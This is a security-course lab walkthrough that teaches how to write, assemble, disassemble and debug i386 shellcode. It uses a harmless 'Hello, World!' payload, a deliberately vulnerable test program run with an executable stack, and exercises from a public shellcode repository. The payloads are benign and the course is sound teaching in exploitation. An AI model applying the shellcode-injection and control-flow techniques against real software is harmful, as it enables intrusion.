= Shellcode Walkthrough =
== Resources ==
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-slides.pdf|Slides]]
[[http://security.cs.pub.ro/hexcellents/res/shellcode-walkthrough-skel.zip|Tasks archive]]
[[http://shell-storm.org/shellcode/|Shellcode repository]]
== Initial info ==
When creating an attack vector the attacker would usually aim to run a shellcode. However, due to program specifics and modern attack prevention mechanisms, it is uncommon for an attack to consist of a single step. There is no recipe, and an attacker will combine multiple steps and actions for the attack to be successful.
An attacker will typically employ information leak attacks to extract addresses and values, use buffer overflow attacks to overwrite sensitive data, inject shellcodes and execute them by modifying the program control flow, and so on. The way these steps are woven together depends on the vulnerability and the program specifics. The attacker is the one that needs to find the best way to tie these steps together to exploit the vulnerability.
When doing a shellcode-based attack, the attacker needs to get the shellcode into the process memory and have the process execute it. For that to happen, the attacker needs to go through three steps:
- The attacker needs to create the shellcode. This is typically done by writing assembly code and then assembling that code into binary code.
- The attacker places the shellcode inside the vulnerable process address space. This is done by feeding the binary shellcode as input: standard input, program arguments, reading from sockets, environment variables.
- The attacker needs to trigger the execution of the shellcode. This means altering the program control flow by typically altering a function return address or a function pointer to point to the start of the shellcode.
While the above three steps are not necessarily chronological, one can identify each of them as parts of a shellcode-based attack.
== Shellcode ==
A //shellcode// is a little piece of binary data that is meant to be executed by a process as part of an attack vector. An attacker would usually place a shellcode in the process memory and aim to execute it to trigger an advantageous effect for the attacker.
While a shellcode would typically result in the attacker gaining a shell process by means of the [[http://man7.org/linux/man-pages/man2/execve.2.html|execve]] system call, this needn't always be the case. Some shellcodes may write data to a socket, scan the memory, open or create a file and so on.
A shellcode is typically written in assembly language, then assembled into binary code and fed to the vulnerable program. There are three actions an attacker must undertake to run a shellcode in a vulnerable program:
- Write the shellcode: typically done in assembly and then converted into binary code.
- Inject the shellcode into the memory address space of the vulnerable process. This is fed through some form of input to the process (standard input, program arguments, sockets, I/O, environment variables etc.).
- Trigger the running of the shellcode by jumping to the shellcode address, usually done through a buffer overflow.
== Reminder: Generating/writing binary data ==
When dealing with shellcodes, we work with binary data and we need to be able to generate it. One example is when we need to write a hexadecimal address such as ''0x0804804b''. Shellcodes may also need to be written to a file or be fed directly to the process. Generating (binary) data and writing it is a common step when creating attack vectors, especially when dealing with shellcodes.
In order to generate binary data, one can use any programming language, though it is common to use Bash (shell commands), Python or Perl. Let's write the hexadecimal address ''0x0804804b'' to standard output using different approaches. The commands to do this are:
$ echo -e '\x4b\x80\x04\x08'
K�
$ python -c 'print "\x4b\x80\x04\x08"'
K�
$ perl -e 'print "\x4b\x80\x04\x08"'
K�
The binary data is not readable from a console. You can either pipe to a hex dumping command (such as ''hexdump'' or ''xxd'' or ''od'') or you can dump it to a file:
$ python -c 'print "\x4b\x80\x04\x08"' | od -t x4
0000000 0804804b 0000000a
$ perl -e 'print "\x4b\x80\x04\x08"' > dump
$ od -t x4 dump
0000000 0804804b
0000004
In the snippets above, the ''0000000a'' value in the output generated by Python appears because the Python ''print'' statement appends a newline character (''\n'', ''0x0a'' in hexadecimal) to the output string.
Python and Perl may also be used to generate a string that repeats a character a number of times. For example, if we wanted to generate 50 ''A'' characters followed by the above address we could issue the commands:
$ python -c 'print "A"*50 + "\x4b\x80\x04\x08"' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4b80 0408 0a AAK....
$ perl -e 'print "A"x50,"\x4b\x80\x04\x08"' | xxd
00000000: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
00000030: 4141 4b80 0408 AAK...
We've used ''xxd'' to dump hexadecimal data.
Please note that a hexadecimal dump will print a dot (''.'') when the corresponding byte is not a printable ASCII character (for example a control character such as ''0x04'', or a byte above ''0x7e'' such as ''0x80'').
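The Python one-liners above rely on Python 2, where ''print'' writes the string bytes unchanged. Under Python 3, strings are Unicode and ''\x80'' would typically be encoded as two bytes (UTF-8) on output, so binary data is better built as a ''bytes'' object. Below is a minimal sketch, assuming Python 3; the helper name ''build_payload'' is made up for illustration.

```python
import struct

def build_payload(padding_len, address):
    """Return padding_len 'A' bytes followed by a 32-bit little-endian address."""
    return b"A" * padding_len + struct.pack("<I", address)

payload = build_payload(50, 0x0804804B)
# Show the payload as hex text; to emit the raw bytes instead, use
# sys.stdout.buffer.write(payload), which adds no trailing newline.
print(payload.hex())
```

The ''"<I"'' format asks ''struct.pack'' for an unsigned 32-bit value in little-endian order, which is why the address can be written in its natural form instead of being reversed by hand.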
== Reminder: Disassembling a raw binary file ==
It is usually the case that we have access to the raw (binary) shellcode (that we may have generated) and we want to make sure it does exactly what we want it to do. For that we want to disassemble the binary shellcode.
In the ''binary-shellcode/'' subfolder in the tasks archive there is a file named ''shellcode.bin'' that is a binary file:
$ xxd shellcode.bin
00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh
00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............
00000020: b804 0000 00cd 80
We can see that the file contains some readable strings; we want to disassemble it as a raw file. For that we use ''objdump'' with the proper arguments:
$ objdump -D -b binary -m i386 -M intel shellcode.bin
shellcode.bin: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 68 21 0a 00 00 push 0xa21
5: 68 6f 72 6c 64 push 0x646c726f
a: 68 6f 2c 20 57 push 0x57202c6f
f: 68 48 65 6c 6c push 0x6c6c6548
14: ba 0e 00 00 00 mov edx,0xe
19: 89 e1 mov ecx,esp
1b: bb 01 00 00 00 mov ebx,0x1
20: b8 04 00 00 00 mov eax,0x4
25: cd 80 int 0x80
The above command does raw disassembling, the arguments meaning:
* ''-D'': disassemble all, not only text/code zones. In our case this means disassemble the whole file.
* ''-b binary'': treat the file as not having a specific object/executable format (such as ELF, COFF, Mach-O or PE).
* ''-m i386'': the machine code inside the binary file is i386 (x86).
* ''-M intel'': when disassembling use Intel assembly syntax, as opposed to the AT&T assembly syntax.
The binary file is indeed a shellcode: a short sequence of instructions that ends in a system call (''int 0x80''). This shellcode invokes system call number 4, i.e. ''write'' (''eax'' is ''4''). It writes to file descriptor ''1'' (''ebx'' is ''1''), meaning standard output. The buffer is the string built on the stack by the four ''push'' instructions (''ecx'' is set to ''esp'') and the length is 14 bytes (''edx'' is ''0xe''). What this shellcode does is write the ''Hello, World!\n'' string to standard output.
This binary shellcode file was obtained by writing a byte string. The byte string is stored in the ''shellcode.print'' file and we can regenerate the raw shellcode file through a command such as:
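To see why the four ''push'' instructions produce the message, it helps to rebuild the stack contents by hand. The sketch below assumes Python 3; the names ''PUSHED'' and ''stack_contents'' are illustrative only. Each immediate is stored in little-endian order, and the last value pushed ends up at the lowest address, i.e. where ''esp'' points.

```python
import struct

# Immediate operands of the four push instructions, in program order.
PUSHED = [0x0A21, 0x646C726F, 0x57202C6F, 0x6C6C6548]

def stack_contents(pushed):
    """Bytes as seen from esp upward after the pushes (last push is lowest)."""
    return b"".join(struct.pack("<I", value) for value in reversed(pushed))

message = stack_contents(PUSHED)[:14]  # edx = 0xe = 14 bytes are written
print(message)  # b'Hello, World!\n'
```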
$ cat shellcode.print
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
$ echo -en '\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80' > shellcode-2.bin
$ cmp shellcode.bin shellcode-2.bin
As the last command (''cmp'') issues no output, we know the ''shellcode-2.bin'' file we generated is identical to the initial file.
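The same conversion can be done without relying on the ''echo'' escape handling of a particular shell. This is a minimal sketch, assuming Python 3; ''parse_byte_string'' is a hypothetical helper name.

```python
import re

def parse_byte_string(text):
    r"""Convert text such as '\x68\x21' into the bytes it denotes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

# First instruction of the shellcode above: push 0xa21
print(parse_byte_string(r"\x68\x21\x0a\x00\x00"))
```

Applying the function to the contents of ''shellcode.print'' and comparing the result with the contents of ''shellcode.bin'' would be the counterpart of the ''cmp'' check.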
=== Task: Create and disassemble binary shellcodes ===
Let's practice the generation and investigation of binary shellcodes.
Extract the byte strings from these two shellcodes ([[http://shell-storm.org/shellcode/files/shellcode-216.php|1]], [[http://shell-storm.org/shellcode/files/shellcode-827.php|2]]) and generate binary shellcode files. Then disassemble these binary shellcode files and check with the initial links that the assembly code is similar.
== Testing a shellcode ==
Now that we know what a shellcode is, what it looks like and how we can verify it by disassembling it, let's test one. In the ''hello-shellcode/'' subfolder in the tasks archive we have developed a very small program (''vuln.c'') for testing the shellcode.
The ''vuln.c'' program is very simple. What it does is define a ''shellcode'' string and initialize it to our earlier byte string shellcode for printing "Hello, World!". In main we define a function pointer ''func_ptr'' and initialize it forcefully (through a type cast) to the ''shellcode'' string. Then we call ''func_ptr'' which will result in the execution of the binary code within the ''shellcode'' string.
In order to test it, we will first compile the program using ''make''
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
resulting in the generation of the ''vuln'' executable.
Then we will run the ''vuln'' executable:
$ ./vuln
Hello, World!
Segmentation fault
and see that it really gets to execute the shellcode, since the "Hello, World!" string is printed to standard output. So the testing of the shellcode is successful.
The running of the executable also results in the process being delivered a segment violation signal (''SIGSEGV'', resulting in the ''Segmentation fault'' message being printed out), but we'll get to that later.
The linker was invoked with the ''-zexecstack'' option. This option is required to be able to execute code from the data section where the ''shellcode'' string is located. This is a trick on our side to allow the execution of code from program sections that are normally non-executable; in modern programs these sections are usually non-executable and other techniques are needed to bypass this limitation. We will discuss those in future sessions.
=== Reminder: System calls and use of strace ===
A shellcode will usually perform its actions through system calls. In the test above we used the ''write'' system call (i.e. system call number ''4'', stored in ''eax'') to print the "Hello, World!" message. A system call is the most basic way of doing actions by directly accessing the operating system interface (i.e. the system call interface). The programmer stores the system call number in the ''eax'' register and the parameters in the other registers (''ebx'', ''ecx'', ''edx'', ''esi'', ''edi'') and then issues the system call trap through the ''int 0x80'' instruction.
We can check the usage of system calls in a shellcode by disassembling the binary shellcode file and checking for the presence of the ''int 0x80'' trap instruction. The experienced hacker would also check the byte string for the sequence ''\xcd\x80'', which is the binary encoding of the ''int 0x80'' trap instruction.
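The byte-level check can be scripted. The sketch below assumes Python 3 and uses the "Hello, World!" shellcode bytes from the earlier dump; ''find_int80'' is an illustrative name. Keep in mind that a plain byte search can also match ''cd 80'' inside an operand or inside data, so a hit is a hint, not a proof.

```python
SHELLCODE = bytes.fromhex(
    "68210a0000" "686f726c64" "686f2c2057" "6848656c6c"
    "ba0e000000" "89e1" "bb01000000" "b804000000" "cd80"
)

def find_int80(code):
    """Return every offset where the byte pair cd 80 occurs."""
    offsets = []
    pos = code.find(b"\xcd\x80")
    while pos != -1:
        offsets.append(pos)
        pos = code.find(b"\xcd\x80", pos + 1)
    return offsets

print([hex(off) for off in find_int80(SHELLCODE)])  # ['0x25']
```

The reported offset matches the ''25:'' line in the ''objdump'' listing of the same shellcode.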
If we want to check the shellcode is being run or debug it, we can use ''strace'' for monitoring system calls. For our above program we can check the calling of the ''write'' system call with ''strace''
$ strace ./vuln
execve("./vuln", ["./vuln"], [/* 36 vars */]) = 0
[...]
write(1, "Hello, World!\n", 14Hello, World!
) = 14
[...]
''strace'' is able to show us the correct invocation of the ''write'' system call, with the proper arguments.
Another way of doing runtime investigation is through the use of GDB as shown in the next section.
''strace'' is very useful for troubleshooting shellcode execution. There may be times when a shellcode appears OK when doing static analysis (i.e. disassembling) but it doesn't work properly. ''strace'' is a quick way to check that the system calls that we expect to happen are done properly (i.e. they use proper arguments).
=== Using GDB to inspect the shellcode ===
Thorough dynamic investigation of the shellcode is achieved through the use of GDB. We will start the ''vuln'' executable under GDB and then we will see what happens when ''func_ptr'' gets called.
We will start the program under GDB (with [[https://github.com/longld/peda|PEDA]] support), breakpoint at main and check the disassembling of the code:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[----------------------------------registers-----------------------------------]
[...]
[-------------------------------------code-------------------------------------]
0x80483d6 <main+11>: mov ebp,esp
0x80483d8 <main+13>: push ecx
0x80483d9 <main+14>: sub esp,0x14
=> 0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0
0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc]
0x80483e6 <main+27>: call eax
0x80483e8 <main+29>: mov eax,0x0
0x80483ed <main+34>: add esp,0x14
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Temporary breakpoint 1, main () at vuln.c:14
14 void (*func_ptr)(void) = (void (*)(void)) shellcode;
gdb-peda$
The current ''mov'' instruction and the next one (at addresses ''main+17'' and ''main+24'') result in ''eax'' being initialized to ''0x80484c0''. This is the equivalent of the ''func_ptr'' function pointer being initialized to the address of the ''shellcode'' string, as can be seen in the last part of the GDB output. We'll step two instructions (using the GDB ''si'' command) and check that:
gdb-peda$ si
[...]
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0x80484c0 --> 0xa2168 ('h!\n')
[...]
[-------------------------------------code-------------------------------------]
0x80483d9 <main+14>: sub esp,0x14
0x80483dc <main+17>: mov DWORD PTR [ebp-0xc],0x80484c0
0x80483e3 <main+24>: mov eax,DWORD PTR [ebp-0xc]
=> 0x80483e6 <main+27>: call eax
0x80483e8 <main+29>: mov eax,0x0
0x80483ed <main+34>: add esp,0x14
0x80483f0 <main+37>: pop ecx
0x80483f1 <main+38>: pop ebp
[...]
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080483e6 17 func_ptr();
gdb-peda$ p/x &shellcode
$1 = 0x80484c0
gdb-peda$
As expected, ''eax'' is now initialized to ''0x80484c0'', the address of the ''shellcode'' string, as shown in the last GDB command.
The next instruction issued is ''call eax''. This means that we will jump to and execute code starting from the address in ''eax'', i.e. the address of the ''shellcode'' string, our shellcode. We will issue multiple ''si'' commands to see our program go through the shellcode instructions until reaching the system call trap instruction (''int 0x80''):
gdb-peda$ si
[...]
gdb-peda$ si
[...]
gdb-peda$ si
[...]
[...]
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd2fc ("Hello, World!\n")
EIP: 0x80484e5 --> 0x10080cd
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484d9 <shellcode+25>: mov ecx,esp
0x80484db <shellcode+27>: mov ebx,0x1
0x80484e0 <shellcode+32>: mov eax,0x4
=> 0x80484e5 <shellcode+37>: int 0x80
0x80484e7 <shellcode+39>: add BYTE PTR [ecx],al
0x80484e9: sbb eax,DWORD PTR [ebx]
0x80484eb: cmp ebp,DWORD PTR [eax]
0x80484ed: add BYTE PTR [eax],al
[------------------------------------stack-------------------------------------]
[...]
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484e5 in shellcode ()
Before executing the system call trap we can see that the registers are filled properly:
* ''eax'' is ''4'', i.e. the number of the ''write'' system call
* ''ebx'' is ''1'', i.e. the file descriptor for standard output
* ''ecx'' points to the "Hello, World!\n" string located on the stack
* ''edx'' is ''14'' (''0xe'') the length of the "Hello, World!\n" string
When issuing the next instruction (the system call trap), the ''write'' system call will be invoked, resulting in the printing of the "Hello, World!\n" string.
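The register check done above by eye can be expressed as a small lookup. This is a sketch, assuming Python 3 and the i386 ''int 0x80'' convention described earlier; the ''SYSCALLS'' table holds only a handful of entries and ''describe_syscall'' is a made-up helper name.

```python
# A few i386 system call numbers (see asm/unistd_32.h) with argument counts.
SYSCALLS = {1: ("exit", 1), 3: ("read", 3), 4: ("write", 3), 11: ("execve", 3)}
ARG_REGS = ["ebx", "ecx", "edx", "esi", "edi"]

def describe_syscall(regs):
    """Render the system call that int 0x80 would issue for these registers."""
    name, argc = SYSCALLS[regs["eax"]]
    args = ", ".join(hex(regs[r]) for r in ARG_REGS[:argc])
    return "%s(%s)" % (name, args)

# Register values copied from the GDB output right before int 0x80.
regs = {"eax": 0x4, "ebx": 0x1, "ecx": 0xFFFFD2FC, "edx": 0xE}
print(describe_syscall(regs))  # write(0x1, 0xffffd2fc, 0xe)
```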
After the system call returns, the program continues executing whatever bytes follow the ''shellcode'' string, interpreting them as instructions. At a certain point these instructions are not going to be valid, resulting in the delivery of the ''SIGSEGV'' signal and the program terminating its execution.
== Getting a binary and byte string shellcode ==
Up until now we've learned how to get a binary shellcode from a byte string shellcode using Bash, Python or Perl, and how to disassemble a raw binary shellcode to check its instructions.
But we also need to do it the other way around. We construct a shellcode in assembly and then we need to obtain its binary format and then its byte string format. The byte string format is the usual form in which we are going to use the shellcode in programs (be they C, Python, Perl or other programs).
In the ''gen-hello-shellcode/'' subfolder in the tasks archive there is the ''shellcode.S'' file, an assembly file implementing the shellcode printing "Hello, World!\n" that we have used above. We'll use that to create the binary shellcode file and then the byte string shellcode. These steps are similar for any shellcode we would create.
First of all we will use ''nasm'' to assemble the ''shellcode.S'' file into the ''shellcode.bin'' file:
$ nasm -o shellcode.bin shellcode.S
By default, ''nasm'' assembles the given assembly code into raw (also named //flat-form//) binary data. We can inspect the ''shellcode.bin'' file and disassemble it to check whether we did OK:
$ xxd shellcode.bin
00000000: 6821 0a00 0068 6f72 6c64 686f 2c20 5768 h!...horldho, Wh
00000010: 4865 6c6c ba0e 0000 0089 e1bb 0100 0000 Hell............
00000020: b804 0000 00cd 80 .......
$ objdump -D -b binary -m i386 -M intel shellcode.bin
shellcode.bin: file format binary
Disassembly of section .data:
00000000 <.data>:
0: 68 21 0a 00 00 push 0xa21
5: 68 6f 72 6c 64 push 0x646c726f
a: 68 6f 2c 20 57 push 0x57202c6f
f: 68 48 65 6c 6c push 0x6c6c6548
14: ba 0e 00 00 00 mov edx,0xe
19: 89 e1 mov ecx,esp
1b: bb 01 00 00 00 mov ebx,0x1
20: b8 04 00 00 00 mov eax,0x4
25: cd 80 int 0x80
As the output of the disassembling is identical to the initial assembly file (''shellcode.S'') we know we have the correct binary shellcode.
Now we need to extract the byte string shellcode from the binary shellcode file ''shellcode.bin''. We could do this by hand, going through each byte printed out by ''xxd'' and building up the string, but we can automate this by using ''hexdump'' and its ''-e'' option for formatting:
$ hexdump -v -e '"\\" 1/1 "x%02x"' shellcode.bin; echo
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
The ''hexdump'' command, with the given arguments, prints each byte in a format such as ''\xAB'', where ''AB'' is the two-digit hexadecimal representation of the byte.
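For reference, the same formatting is a one-liner in Python. A minimal sketch, assuming Python 3; ''to_byte_string'' is an illustrative name, not part of the tasks archive.

```python
def to_byte_string(data):
    """Format each byte as \\xNN, the form used in C and Python string literals."""
    return "".join("\\x%02x" % byte for byte in data)

# For a real shellcode, read the assembled file first, e.g.:
#   data = open("shellcode.bin", "rb").read()
print(to_byte_string(b"\xb8\x04\x00\x00\x00\xcd\x80"))
```

The example input is the tail of the shellcode (''mov eax,0x4'' followed by ''int 0x80''), so the printed text should match the end of the ''hexdump'' output above.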
All of the above steps are incorporated in the ''Makefile'' file in the ''gen-hello-shellcode/'' subfolder. For getting the binary shellcode file, we would issue the command:
$ make
nasm -o shellcode.bin shellcode.S
The above command assembles the ''shellcode.S'' file into the ''shellcode.bin'' file.
In order to obtain the byte string file, we would issue the command:
$ make print
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80
resulting in the printing of the shellcode in byte string format.
The byte string shellcode can now be integrated into our code and it can be properly placed for execution inside a vulnerable program.
== Graceful return/exit from shellcode ==
In the above runs of the shellcode, the process ended (crashed) by receiving a ''SIGSEGV'' signal. This happened because the shellcode binary code didn't "end" and the execution of binary code continued beyond the shellcode; when reaching an invalid instruction, the program crashes.
In order to avoid that and let the program return from the shellcode or exit gracefully after running the shellcode, we have two options:
- ending the shellcode with a ''ret'' instruction, resulting in the program getting back to the caller function (''main'');
- adding an ''exit'' system call at the end of the shellcode
Let's do the first one. We add a ''ret'' instruction at the end of the ''shellcode.S'' file in the ''gen-hello-shellcode/'' subfolder in the tasks archive:
$ cat shellcode.S
BITS 32
push 0x0a21 ; "\n!"
push 0x646c726f ; "dlro"
push 0x57202c6f ; "W, o"
push 0x6c6c6548 ; "lleH"
mov edx, 14 ; Message length is 14 bytes.
mov ecx, esp ; Stack points to message.
mov ebx, 1 ; Print to standard output (fd = 1).
mov eax, 4 ; __NR_write
int 0x80
ret
In the above listing we can see the addition of the ''ret'' instruction to the shellcode.
We now need to extract the shellcode byte string and replace in the vulnerable program (''vuln.c''). We do that by using the ''Makefile'' file in the ''gen-hello-shellcode/'' subfolder:
$ make print
nasm -o shellcode.bin shellcode.S
\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c\x64\x68\x6f\x2c\x20\x57\x68\x48\x65\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1\xbb\x01\x00\x00\x00\xb8\x04\x00\x00\x00\xcd\x80\xc3
We now place the above byte string shellcode in the ''vuln.c'' file in the ''hello-shellcode/'' subfolder:
$ cat vuln.c
[...]
static const char shellcode[] = "\x68\x21\x0a\x00\x00\x68\x6f\x72\x6c"
"\x64\x68\x6f\x2c\x20\x57\x68\x48\x65"
"\x6c\x6c\xba\x0e\x00\x00\x00\x89\xe1"
"\xbb\x01\x00\x00\x00\xb8\x04\x00\x00"
"\x00\xcd\x80\xc3";
[...]
We now compile the program using the new shellcode byte string
$ make
cc -m32 -Wall -g -c -o vuln.o vuln.c
cc -m32 -zexecstack vuln.o -o vuln
and run it
$ ./vuln
Hello, World!
Segmentation fault
Although we expected the program to exit gracefully it still gets a ''SIGSEGV'' signal. We use ''dmesg'' to find out the faulty address:
$ dmesg | tail -1
[20349.560852] vuln[12204]: segfault at 6c6c6548 ip 000000006c6c6548 sp 00000000ff948540 error 14
We can see that the instruction pointer (''ip'') points to the address ''0x6c6c6548''. This value is actually ASCII text, as we can see by printing its bytes:
$ echo -e '\x6c\x6c\x65\x48'
lleH
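The above string is ''Hell'' with its bytes reversed (the address is written most significant byte first, while x86 stores values in little-endian order), i.e. the beginning of the ''Hello, World!\n'' message that we print. We assume that the stack stores additional data (such as our message), causing the ''ret'' instruction not to work properly.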
We do a GDB investigation for additional info and see what happens when the ''ret'' instruction is executed within the shellcode:
$ gdb -q ./vuln
Reading symbols from ./vuln...done.
gdb-peda$ start
[...]
gdb-peda$ si
Hello, World!
[----------------------------------registers-----------------------------------]
EAX: 0xe
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd2fc ("Hello, World!\n")
EIP: 0x80484e7 --> 0xc3
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80484db <shellcode+27>: mov ebx,0x1
0x80484e0 <shellcode+32>: mov eax,0x4
0x80484e5 <shellcode+37>: int 0x80
=> 0x80484e7 <shellcode+39>: ret
0x80484e8 <shellcode+40>: add BYTE PTR [eax],al
0x80484ea: add BYTE PTR [eax],al
0x80484ec: add DWORD PTR [ebx],ebx
0x80484ee: add edi,DWORD PTR [ebx]
[------------------------------------stack-------------------------------------]
0000| 0xffffd2fc ("Hello, World!\n")
0004| 0xffffd300 ("o, World!\n")
0008| 0xffffd304 ("orld!\n")
0012| 0xffffd308 --> 0xa21 ('!\n')
0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
0020| 0xffffd310 --> 0x1
0024| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
0028| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x080484e7 in shellcode ()
gdb-peda$ si
[----------------------------------registers-----------------------------------]
EAX: 0xe
EBX: 0x1
ECX: 0xffffd2fc ("Hello, World!\n")
EDX: 0xe
ESI: 0x0
EDI: 0x0
EBP: 0xffffd328 --> 0x0
ESP: 0xffffd300 ("o, World!\n")
EIP: 0x6c6c6548 ('Hell')
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x6c6c6548
[------------------------------------stack-------------------------------------]
0000| 0xffffd300 ("o, World!\n")
0004| 0xffffd304 ("orld!\n")
0008| 0xffffd308 --> 0xa21 ('!\n')
0012| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
0016| 0xffffd310 --> 0x1
0020| 0xffffd314 --> 0xffffd3d4 --> 0xffffd533 ("/home/razvan/projects/ctf/sss/summerschool2014.git/sessions/sess-09/skel/hello-shellcode/vuln")
0024| 0xffffd318 --> 0xffffd3dc --> 0xffffd591 ("XDG_VTNR=7")
0028| 0xffffd31c --> 0x80484c0 --> 0xa2168 ('h!\n')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x6c6c6548 in ?? ()
gdb-peda$
When executing the ''ret'' instruction, the instruction pointer ends up at the ''0x6c6c6548'' address, which is actually the string ''Hell''. Comparing the stack before and after ''ret'' shows that the ''Hell'' string at the top of the stack (address ''0xffffd2fc'') was popped into the instruction pointer, as expected from a ''ret'' instruction. Before executing ''ret'' the stack pointer (''esp'') was ''0xffffd2fc'' and pointed to the ''Hello, World!\n'' string. Executing ''ret'' popped the first four bytes (32 bits) from the stack into the instruction pointer (''eip'') and incremented the stack pointer by 4. As a result, ''eip'' now stores the ''Hell'' string, while ''esp'' is ''0xffffd300'' and points to the rest of the string, ''o, World!\n''.
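The effect of ''ret'' can be reproduced with a toy model of the stack. The sketch below assumes Python 3 and copies the stack contents and addresses from the GDB session above; ''simulate_ret'' is a hypothetical helper and only models the pop into ''eip''.

```python
import struct

STACK_BASE = 0xFFFFD2FC  # esp just before ret, as shown by GDB
# The message pushed by the shellcode (padded to 16 bytes), followed by the
# return address into main that call eax had pushed earlier.
STACK = b"Hello, World!\n\x00\x00" + struct.pack("<I", 0x080483E8)

def simulate_ret(esp):
    """Pop a 32-bit little-endian value into eip; return (eip, new esp)."""
    (eip,) = struct.unpack_from("<I", STACK, esp - STACK_BASE)
    return eip, esp + 4

eip, esp = simulate_ret(STACK_BASE)
print(hex(eip), hex(esp))  # 0x6c6c6548 0xffffd300
```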
Our goal is to properly set the stack pointer before executing ''ret'' to make a successful return to the ''main'' function.
=== Task: Fix ret instruction in shellcode ===
In order for ''ret'' to work properly, at the time the ''ret'' instruction is executed the stack pointer needs to have the same value it had when the shellcode started executing. That is, we need to increment the stack pointer (''esp'') to point to that value. In the above GDB output, the value is ''0xffffd30c'' and points to the return address in ''main'', exactly what we want:
0016| 0xffffd30c --> 0x80483e8 (<main+29>: mov eax,0x0)
Update the shellcode to increment the stack pointer (''esp'') to the proper value right before issuing the ''ret'' instruction. This will result in a graceful return from the shellcode to the ''main'' function. If properly done, no ''SIGSEGV'' will be delivered to the program.
Use GDB to see the difference between ''esp'' at the beginning of the shellcode and ''esp'' right before ''ret''. You need to add that difference to ''esp'' right before the ''ret'' instruction in order for the stack to be in the same state it was in at the beginning of the shellcode.
Do not store a fixed address in ''esp''. Due to ASLR (//Address Space Layout Randomization//) being enabled, the top of the stack will be different each time the program is run. Use the ''add'' instruction to update the ''esp'' value and discard the string that was stored on the stack inside the shellcode.
You need to update the ''shellcode.S'' assembly and then obtain the shellcode byte string and update ''vuln.c'' and then compile it and run it.
In case of issues, use GDB to inspect the program. Use ''si'' to go through each instruction in the shellcode and check the stack pointer (''esp''), the instruction pointer (''eip'') and other registers and the stack contents.
=== Task: Use graceful exit in the shellcode ===
Apart from using the ''ret'' instruction to return properly from the shellcode, we can also invoke the ''exit'' system call in the shellcode and terminate the program (gracefully).
Add an equivalent ''exit(0)'' system call in the shellcode using assembly language.
The ''exit'' system call number is ''1''. You may check the ''/usr/include/asm/unistd_32.h'' file for confirmation.
The system call number is placed in the ''eax'' register while the first argument is placed in the ''ebx'' register.
== Task: Update string in shellcode ==
Up until now the string we used for printing inside the shellcode is "Hello, World!\n". Let's change this to "Hello, Romania!\n". For this you will have to update the ''shellcode.S'' assembly file and then obtain the byte string shellcode and place it into the ''vuln.c'' file.
Do that and check that the program now prints the "Hello, Romania!\n" string to standard output. Apply the update to the shellcode version that includes the ''exit(0)'' call, so that the program exits gracefully.
